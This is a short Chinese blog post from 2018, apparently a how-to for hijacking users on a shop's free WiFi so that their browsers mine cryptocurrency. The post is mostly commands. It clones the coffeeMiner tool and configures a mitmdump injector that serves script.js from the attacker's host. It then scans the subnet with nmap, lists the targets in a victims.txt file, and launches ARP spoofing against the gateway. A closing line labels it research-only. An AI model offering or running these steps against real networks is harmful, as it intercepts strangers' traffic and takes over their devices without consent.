劫持WiFi网络接入设备挖矿指南

当你在星巴克使用WiFi的时候有没有想过可能有人偷偷地在用你的浏览器挖矿。这个跟我的另一篇文章类似。


那一篇讲的是使用网站访客的浏览器挖矿,本篇文章讲述的是使用一个商店的免费WiFi的接入者浏览器进行挖矿的方式,其原理是ARP攻击劫持接入者流量在其浏览网页时插入挖矿代码使用其浏览器挖矿。

部署劫持环境

  1. 下载框架源代码
git clone git@github.com:arnaucode/coffeeMiner.git
  1. 安装所需依赖
bash install.sh

配置参数

  1. 变更HTTPServer的IP为本机IP
#查看IP
ifconfig
#编辑脚本
nano coffeeMiner.py
#替换IP地址
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.103:8000/script.js' -T")
  1. 扫描接入设备
    扫描完成之后会出现一个IP列表
nmap -sS 192.168.1.1/24
  1. 将扫描到的IP放到victims.txt
    每行放置一个IP
192.168.1.100

showtime

*ipgateway 为路由网关

python3 coffeeMiner.py ipgateway

*此方式不适用于高级商用路由及开了ARP防护的客户端
*请作为研究使用,有被反追踪的危险

Last modification:March 15th, 2018 at 10:09 am

Leave a Comment